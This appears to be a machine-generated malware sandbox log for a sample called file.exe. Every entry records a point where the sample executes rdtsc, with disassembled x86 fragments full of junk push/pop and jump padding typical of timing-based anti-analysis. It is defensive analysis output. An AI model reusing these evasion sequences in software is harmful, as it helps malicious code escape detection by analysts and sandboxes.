              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8293F3 second address: 829422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jno 00007FE4C120029Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007FE4C1200286h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 829422 second address: 829439 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jo 00007FE4C10F4F66h 0x00000016 pop ecx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E9C7 second address: 82E9CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E9CB second address: 82E9D5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE4C10F4F66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6D49 second address: 7C6D4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D6E6 second address: 82D6F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D6F0 second address: 82D6F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D6F4 second address: 82D6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D6FA second address: 82D708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FE4C1200286h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D708 second address: 82D72F instructions: 0x00000000 rdtsc 0x00000002 je 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE4C10F4F77h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D72F second address: 82D735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82D735 second address: 82D739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82DE3B second address: 82DE43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82DE43 second address: 82DE47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E250 second address: 82E276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FE4C1200286h 0x0000000e jmp 00007FE4C1200298h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E594 second address: 82E5A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E5A1 second address: 82E5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007FE4C1200286h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E5B0 second address: 82E5BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82E84F second address: 82E871 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE4C120029Ah 0x00000008 jmp 00007FE4C1200294h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 834AC7 second address: 834ADB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FE4C10F4F6Eh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833592 second address: 83359C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83359C second address: 8335A6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE4C10F4F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 833C8B second address: 833C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8344FD second address: 83450D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE4C10F4F66h 0x0000000a popad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E813D second address: 7E8150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FE4C1200288h 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E8150 second address: 7E8175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push edx 0x00000007 jno 00007FE4C10F4F7Bh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83F9D4 second address: 83F9DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83FDA8 second address: 83FDB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83FDB0 second address: 83FDC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C1200291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 805CF9 second address: 805D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FE4C10F4F68h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8401AE second address: 8401BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FE4C1200286h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8401BD second address: 8401C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8401C1 second address: 8401CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE4C1200286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840768 second address: 840780 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F74h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840780 second address: 840786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840786 second address: 84078C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84078C second address: 840790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840790 second address: 8407A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jns 00007FE4C10F4F66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8407A4 second address: 8407C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FE4C120028Fh 0x0000000e js 00007FE4C1200292h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8407C4 second address: 8407CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843C13 second address: 843C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C120028Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843C27 second address: 843C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843C2B second address: 843C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8089C9 second address: 8089CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8089CF second address: 8089D9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE4C120028Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8089D9 second address: 64F974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 sub ch, 0000003Bh 0x0000000c push dword ptr [ebp+122D1615h] 0x00000012 xor dword ptr [ebp+122DB696h], ecx 0x00000018 add dword ptr [ebp+122D2664h], esi 0x0000001e call dword ptr [ebp+122D1B95h] 0x00000024 pushad 0x00000025 jmp 00007FE4C10F4F73h 0x0000002a xor eax, eax 0x0000002c pushad 0x0000002d push ecx 0x0000002e mov dword ptr [ebp+122D17ECh], eax 0x00000034 pop edi 0x00000035 add dword ptr [ebp+122D3870h], edi 0x0000003b popad 0x0000003c jbe 00007FE4C10F4F6Ch 0x00000042 mov dword ptr [ebp+122D3870h], edx 0x00000048 mov edx, dword ptr [esp+28h] 0x0000004c jp 00007FE4C10F4F72h 0x00000052 mov dword ptr [ebp+122D2AE8h], eax 0x00000058 pushad 0x00000059 add dword ptr [ebp+122D3870h], eax 0x0000005f popad 0x00000060 mov esi, 0000003Ch 0x00000065 jmp 00007FE4C10F4F6Ch 0x0000006a add esi, dword ptr [esp+24h] 0x0000006e mov dword ptr [ebp+122D17E1h], edx 0x00000074 lodsw 0x00000076 jmp 00007FE4C10F4F75h 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f cld 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jmp 00007FE4C10F4F77h 0x00000089 nop 0x0000008a pushad 0x0000008b jmp 00007FE4C10F4F6Eh 0x00000090 pushad 0x00000091 push eax 0x00000092 push edx 0x00000093 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808AE0 second address: 808B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE4C1200286h 0x0000000a popad 0x0000000b jmp 00007FE4C120028Bh 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 pushad 0x00000017 jc 00007FE4C1200286h 0x0000001d jne 00007FE4C1200286h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FE4C120028Dh 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808B19 second address: 808B36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d js 00007FE4C10F4F66h 0x00000013 popad 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808BC4 second address: 808BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C1200297h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808C6C second address: 808C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808C70 second address: 808C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808C76 second address: 808C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 808C7C second address: 808C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80902E second address: 809033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8093EC second address: 80940A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 sub edx, dword ptr [ebp+122D2A58h] 0x0000000f push 0000001Eh 0x00000011 sub ecx, dword ptr [ebp+122D199Ch] 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pushad 0x0000001c popad 0x0000001d pop esi 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 809726 second address: 80972D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80972D second address: 80977E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov cx, si 0x0000000c lea eax, dword ptr [ebp+1248C283h] 0x00000012 call 00007FE4C120028Dh 0x00000017 pop ecx 0x00000018 call 00007FE4C1200290h 0x0000001d add dx, 8D18h 0x00000022 pop edi 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 jmp 00007FE4C1200294h 0x0000002e popad 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80977E second address: 7E813D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FE4C10F4F66h 0x00000009 jmp 00007FE4C10F4F73h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FE4C10F4F68h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push edx 0x0000002f or dword ptr [ebp+122D37D3h], ebx 0x00000035 pop edx 0x00000036 lea eax, dword ptr [ebp+1248C23Fh] 0x0000003c mov dword ptr [ebp+122D2867h], edi 0x00000042 push eax 0x00000043 jno 00007FE4C10F4F82h 0x00000049 mov dword ptr [esp], eax 0x0000004c jnp 00007FE4C10F4F6Ch 0x00000052 mov edi, dword ptr [ebp+122D2B5Ch] 0x00000058 call dword ptr [ebp+122D380Ah] 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84408F second address: 844093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844093 second address: 8440BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C10F4F6Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE4C10F4F74h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8440BD second address: 8440CA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE4C1200286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8440CA second address: 8440D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84422E second address: 844233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844233 second address: 84423D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE4C10F4F6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844395 second address: 8443A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8443A1 second address: 8443A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8473AA second address: 8473B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8473B0 second address: 8473B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847520 second address: 847524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847524 second address: 847528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847697 second address: 84769B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84769B second address: 8476A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847806 second address: 84780E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B3EA second address: 84B3F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B3F1 second address: 84B404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FE4C1200288h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B404 second address: 84B424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FE4C10F4F66h 0x0000000c popad 0x0000000d jmp 00007FE4C10F4F6Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B424 second address: 84B42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84B42A second address: 84B42E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC9F7 second address: 7BCA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84AFBB second address: 84AFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C10F4F6Dh 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8518DA second address: 851920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007FE4C120028Ah 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FE4C120028Bh 0x00000014 jmp 00007FE4C120028Bh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FE4C120028Ch 0x00000024 pop edx 0x00000025 js 00007FE4C120028Eh 0x0000002b jne 00007FE4C1200286h 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 851920 second address: 851930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4C10F4F6Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C00BA second address: 7C00C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE4C1200286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C00C4 second address: 7C0111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F79h 0x00000007 jmp 00007FE4C10F4F73h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007FE4C10F4F6Eh 0x00000015 jmp 00007FE4C10F4F6Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C0111 second address: 7C0126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FE4C120028Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C0126 second address: 7C012A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850088 second address: 85008E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85008E second address: 850097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 850097 second address: 85009D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85009D second address: 8500BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE4C10F4F6Eh 0x0000000c jno 00007FE4C10F4F66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
